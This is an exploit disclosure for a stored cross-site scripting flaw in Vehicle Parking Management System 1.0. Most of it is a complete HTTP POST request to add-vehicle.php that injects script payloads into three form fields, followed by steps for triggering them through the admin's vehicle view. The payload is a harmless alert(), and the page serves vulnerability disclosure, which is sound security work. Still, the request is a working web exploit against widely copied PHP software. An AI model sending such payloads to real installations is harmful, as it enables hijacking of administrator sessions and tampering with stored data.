Vehicle Parking Management System 1.0 Cross Site Scripting

Vehicle Parking Management System version 1.0 suffers from a persistent cross site scripting vulnerability. Original discovery of persistent cross site scripting in this version is attributed to Tushar Vaidya in February of 2021.


MD5 | ac9f28e3fc856df19b30c3f0ff99cfb6

# Exploit Title: Vehicle Parking Management System -  Stored Cross-Site-Scripting (XSS)
# Date: 2021-07-09
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/vehicle-parking-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10, XAMPP


################
# Description #
################

# The system is vulnerable to Stored XSS on add-vehicle.php endpoint.


########
# PoC #
########


PoC ) param vehcomp,vehreno,ownername - Stored XSS
Payload: 1;<script>alert(1);</script>
Request:
========

POST /vpms/add-vehicle.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------39455081863880051020862918006
Content-Length: 842
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/vpms/add-vehicle.php
Cookie: PHPSESSID=01nt1pa7lgtioktv5ii907c8l3
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="catename"

Bicycles
-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="vehcomp"

1;<script>alert(1);</script>
-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="vehreno"

2;<script>alert(2);</script>
-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="ownername"

3;<script>alert(3);</script>
-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="ownercontno"

7627637673
-----------------------------39455081863880051020862918006
Content-Disposition: form-data; name="submit"


-----------------------------39455081863880051020862918006--


############
# Fire up #
############

1) Goto: Login as Admin
2) Goto: Manage Vehicle -> Manage In Vehicle -> Click view
3) Stored XSS payloads are fired

Related Posts